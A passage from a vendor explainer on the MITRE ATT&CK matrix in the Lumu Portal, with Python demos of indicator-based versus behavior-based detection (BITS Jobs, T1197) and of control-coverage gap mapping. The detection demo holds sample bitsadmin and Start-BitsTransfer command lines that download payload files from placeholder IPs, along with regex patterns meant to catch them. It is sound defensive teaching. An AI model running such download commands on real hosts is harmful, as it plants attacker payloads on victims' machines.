The MITRE Corporation is a nonprofit organization founded in 1958 that operates federally funded research and development centers on behalf of U.S. government agencies. MITRE ATT&CK® (Adversarial Tactics, Techniques, and Common Knowledge) is a knowledge base and matrix of adversary tactics, techniques, and procedures (TTPs), documenting over 200 techniques drawn from observed real-world intrusions. Defenders use the matrix to classify attacker activity, assess an organization’s risk, and choose the most effective defensive options. Much of ATT&CK’s popularity comes from the shared vocabulary it provides: a technique ID refers to the same adversary behavior for everyone, which makes communication about the precise characteristics of a threat unambiguous across the cyber defense community.
ATT&CK aims to improve post-compromise detection of adversaries in enterprises by describing how cyber adversaries behave once they are inside an organization’s network. It helps to identify the nature of a compromise, point out which controls should protect against it, and ultimately measure how effective the organization’s defenses are. ATT&CK is not intended to be a checklist of everything that must be addressed, but its focus on adversary behavior rather than on individual tools gives defenders a strong basis for detecting and stopping an ongoing attack before data exfiltration occurs.
The Enterprise ATT&CK Matrix implemented in the Lumu Portal comprises 12 columns, one per Tactic (the adversary’s objective), each expanded into the specific known adversarial methods used to reach that objective. Techniques and sub-techniques represent the steps an attacker typically follows when attacking your infrastructure. Depending on the adversary’s objective, several techniques may be applied to reach a single tactical goal, and not every tactic needs to appear in a given intrusion.
TTPs describe adversarial behavior. When your detection and response are built on these indicators, your organization addresses the attacker’s actions directly, not only the specific programs or tools they happen to use. Blocking atomic indicators such as hash values, IP addresses, and domain names is relatively easy for an attacker to circumvent: a recompiled binary, a new server, or a freshly registered domain defeats the block. When your organization can respond promptly to the attacker’s TTPs, the adversary has to learn new behaviors, which is far more difficult and time-consuming.
Tactics represent “why” an adversary performs an action, that is, what they gain by completing it; techniques represent “how” they achieve that tactical goal. For example, the Persistence tactic includes techniques such as Hijack Execution Flow (T1574), BITS Jobs (T1197), and External Remote Services (T1133). Each of these is a single technique attackers may use to reach the goal of persistence. The same technique can serve more than one tactic: External Remote Services, for instance, is listed under both Initial Access and Persistence. Sub-techniques are a more specific description of the attacker’s behavior within a technique. Techniques are referenced in ATT&CK as Txxxx and sub-techniques as Txxxx.xxx, where the suffix identifies a sub-technique of the parent technique. For example, the “Use Alternate Authentication Material” technique has the ID T1550, the “Command and Scripting Interpreter” technique has the ID T1059, and its sub-technique “Windows Command Shell” has the ID T1059.003.
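The difference between blocking an indicator and detecting a behavior can be made concrete. The following Python block is an added illustration, not Lumu Portal code or MITRE tooling: it runs an indicator-based rule (hash, IP, domain) and a behavior-based rule for the BITS Jobs technique (T1197) over three constructed process-creation events. The event contents, hashes, and IOC values are made up for the example; only the ATT&CK technique and the two real ways of starting a BITS transfer (bitsadmin.exe and the Start-BitsTransfer PowerShell cmdlet) are taken from practice.

```python
import hashlib
import re

# Constructed sample process-creation events (not Lumu data): image name, the
# SHA-256 of the image, and the full command line. Hash values are derived from
# placeholder bytes so the example runs offline.
def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

EVENTS = [
    # First campaign: bitsadmin pulls a payload from an IP already in the IOC list.
    {"image": "bitsadmin.exe", "sha256": sha256(b"placeholder bitsadmin"),
     "cmdline": "bitsadmin.exe /transfer job1 /download /priority high "
                "http://203.0.113.5/a.dat C:\\Users\\Public\\a.dat"},
    # Second campaign: same behavior (a BITS transfer, ATT&CK T1197) but a new
    # server, a new file name and a different tool (the PowerShell cmdlet).
    {"image": "powershell.exe", "sha256": sha256(b"placeholder powershell"),
     "cmdline": 'powershell.exe -NoProfile -Command "Start-BitsTransfer '
                '-Source http://198.51.100.7/x.bin -Destination C:\\ProgramData\\x.bin"'},
    # Benign activity.
    {"image": "notepad.exe", "sha256": sha256(b"placeholder notepad"),
     "cmdline": "notepad.exe C:\\Users\\alice\\notes.txt"},
]

# Atomic indicators learned from the first campaign (constructed values).
IOCS = {
    "sha256": {sha256(b"placeholder dropper")},
    "ip": {"203.0.113.5"},
    "domain": {"updates.example.net"},
}

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RE = re.compile(r"https?://([^/\s:\"']+)", re.IGNORECASE)

# Behavioral rule for ATT&CK T1197 (BITS Jobs): any BITS transfer, whether
# started through bitsadmin.exe or Start-BitsTransfer, regardless of which
# binary hash, server, file name or job name is involved.
BITS_PATTERNS = [
    re.compile(r"\bbitsadmin(?:\.exe)?\b.*\s/(?:transfer|addfile)\b", re.IGNORECASE),
    re.compile(r"\bStart-BitsTransfer\b", re.IGNORECASE),
]


def indicator_match(event: dict, iocs: dict) -> bool:
    """Indicator-based rule: fire only on a known hash, IP or domain."""
    if event["sha256"] in iocs["sha256"]:
        return True
    cmd = event["cmdline"]
    if any(ip in iocs["ip"] for ip in IP_RE.findall(cmd)):
        return True
    hosts = {h.lower() for h in HOST_RE.findall(cmd)}
    return bool(hosts & iocs["domain"])


def bits_transfer_behavior(event: dict) -> bool:
    """Behavior-based rule: fire on the technique itself (T1197)."""
    return any(p.search(event["cmdline"]) for p in BITS_PATTERNS)


def evaluate(events: list, iocs: dict) -> list:
    """Run both rules over every event and report which ones fired."""
    return [
        {"image": e["image"],
         "indicator": indicator_match(e, iocs),
         "behavior": bits_transfer_behavior(e)}
        for e in events
    ]


if __name__ == "__main__":
    for row in evaluate(EVENTS, IOCS):
        print(f"{row['image']:<16} indicator={row['indicator']!s:<5} behavior={row['behavior']}")
```

The indicator rule catches only the first campaign; once the adversary changes server and tool, it goes quiet. The behavior rule fires on both campaigns because the adversary still needs a BITS transfer to achieve persistence, and stays quiet on the benign event.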
Lumu Portal provides a visualization with technical detail at the technique level and the relationship with the context around the tactical level. The ATT&CK Matrix is available for each malicious activity in the context area of the Lumu Portal. By default, the techniques associated with each incident found are highlighted in the MITRE ATT&CK Matrix. Figure 2 is an example of how the Lumu Portal presents different techniques used by a threat in an incident.
When you click on a technique or sub-technique, you can see its description, references, and procedure examples describing how adversaries have implemented that technique. This area shows the ID, name, description, the platforms affected by the technique/sub-technique, and the link to the MITRE page that contains procedure examples, mitigations, and references.
The ATT&CK framework implemented in the Lumu Portal is designed to map the adversaries’ TTPs and help organizations answer questions such as: What are their goals? How did they get inside? How are they moving through the network? What might they do next? With that information in hand, you can determine the best way to prepare for and stop an attack precisely.
There are many benefits of taking advantage of the MITRE ATT&CK Matrix when it comes to Incidents reported in the Lumu Portal, some of which have already been mentioned, such as identifying gaps in defenses and making more accurate decisions about imminent risks.
These are some use cases for the ATT&CK Framework:
‘Blue team’ is how we identify the security professionals responsible for proactively maintaining the organization’s infrastructure defenses against all cyberattacks, risks, and threats. With the ATT&CK context provided in the Lumu Portal, these teams can quickly identify the adversary and techniques used in a current attack and ultimately provide recommendations to increase the organization's cybersecurity readiness posture.
Knowing how you are being attacked is as essential as knowing your defense capabilities. Mapping your defense controls onto the ATT&CK matrix gives a clear view of which adversary behaviors you can defend against and where you need to tune your detection and response capabilities. The technique information supplied by ATT&CK helps your organization identify gaps in its detection and threat intelligence coverage more precisely, assess risks, prioritize, and plan mitigations.
Overlaying your current cybersecurity infrastructure onto the threats identified for your industry and the incidents Lumu detects in your organization lets you fill the gaps in your defense and reduce redundant controls.
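To show both the Txxxx / Txxxx.xxx identifier scheme described earlier and the mapping of controls onto the matrix discussed here, the following Python block is an added example, not Lumu Portal code: it validates technique IDs, resolves sub-techniques to their parent technique, and reports, per tactic, the techniques seen in incidents that no existing control covers. The technique subset and the incident and control lists are constructed for illustration; the IDs, names, and tactic assignments in the subset follow the Enterprise matrix.

```python
import re
from collections import defaultdict

# Constructed subset of the Enterprise matrix: technique ID -> (name, tactics).
# The IDs, names and tactic assignments follow MITRE ATT&CK Enterprise; the
# subset itself is illustrative, not the full matrix.
TECHNIQUES = {
    "T1566": ("Phishing", ["Initial Access"]),
    "T1133": ("External Remote Services", ["Initial Access", "Persistence"]),
    "T1059": ("Command and Scripting Interpreter", ["Execution"]),
    "T1197": ("BITS Jobs", ["Persistence", "Defense Evasion"]),
    "T1574": ("Hijack Execution Flow",
              ["Persistence", "Privilege Escalation", "Defense Evasion"]),
    "T1550": ("Use Alternate Authentication Material",
              ["Defense Evasion", "Lateral Movement"]),
    "T1071": ("Application Layer Protocol", ["Command and Control"]),
    "T1041": ("Exfiltration Over C2 Channel", ["Exfiltration"]),
}

# Txxxx for a technique, Txxxx.xxx for a sub-technique of that technique.
ID_RE = re.compile(r"^T(\d{4})(?:\.(\d{3}))?$")


def parse_attack_id(attack_id: str) -> tuple:
    """Validate a Txxxx / Txxxx.xxx ID and return (parent_id, sub_id_or_None)."""
    m = ID_RE.match(attack_id.strip().upper())
    if not m:
        raise ValueError(f"not an ATT&CK technique ID: {attack_id!r}")
    parent = f"T{m.group(1)}"
    sub = f"{parent}.{m.group(2)}" if m.group(2) else None
    return parent, sub


def is_covered(attack_id: str, covered: set) -> bool:
    """A control mapped to the parent technique covers all of its sub-techniques;
    a control mapped to one sub-technique covers only that sub-technique."""
    parent, sub = parse_attack_id(attack_id)
    return parent in covered or (sub is not None and sub in covered)


def tactic_view(detected_ids: list) -> dict:
    """Group technique IDs by tactic, the way the matrix highlights them."""
    view = defaultdict(set)
    for attack_id in detected_ids:
        parent, _ = parse_attack_id(attack_id)
        if parent not in TECHNIQUES:
            raise KeyError(f"{parent} is not in the local technique map")
        for tactic in TECHNIQUES[parent][1]:
            view[tactic].add(attack_id.strip().upper())
    return {t: sorted(ids) for t, ids in sorted(view.items())}


def coverage_gaps(detected_ids: list, covered_ids: list) -> dict:
    """Tactic -> techniques seen in incidents that no existing control covers."""
    covered = {i.strip().upper() for i in covered_ids}
    for i in covered:
        parse_attack_id(i)  # reject malformed control mappings early
    uncovered = [i for i in detected_ids if not is_covered(i, covered)]
    return tactic_view(uncovered)


if __name__ == "__main__":
    # Constructed input: techniques highlighted in recent incidents, and the
    # techniques the organization's controls are mapped to.
    detected = ["T1566.001", "T1059.003", "T1197", "T1071.001", "T1041"]
    controls = ["T1566", "T1059", "T1071"]
    for tactic, ids in coverage_gaps(detected, controls).items():
        names = ", ".join(f"{i} ({TECHNIQUES[parse_attack_id(i)[0]][0]})" for i in ids)
        print(f"{tactic}: {names}")
```

With the constructed input, BITS Jobs and Exfiltration Over C2 Channel are the uncovered techniques, and BITS Jobs appears under both Persistence and Defense Evasion because a single technique can serve more than one tactic. The coverage rule is deliberately strict in one direction: covering T1059.003 alone does not count as covering all of T1059, since the other command interpreters would still be undetected.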
‘Red teams’ are internal or external teams dedicated to testing a cybersecurity infrastructure’s effectiveness by emulating possible adversaries’ tools and techniques in the most realistic way possible. The MITRE ATT&CK context allows red teams to select tactics and the sequence of techniques to model real-world adversaries. This adversarial approach can help organizations assess their prevention, detection, remediation, and eradication performance against these actual threats.
One of the top use cases for the ATT&CK Framework is to support your organization in testing its cybersecurity solutions’ efficacy. The red teams can take advantage of the context information provided by the ATT&CK Matrix in the Lumu Portal to build models that emulate adversaries’ behaviors and test the organization’s security controls. Organizations can also use the context ATT&CK information to automate security validation testing by using breach and attack simulation systems that apply the MITRE ATT&CK framework.
The following table summarizes the 12 tactics in the MITRE ATT&CK Enterprise framework that you can find in the context information of Lumu Portal: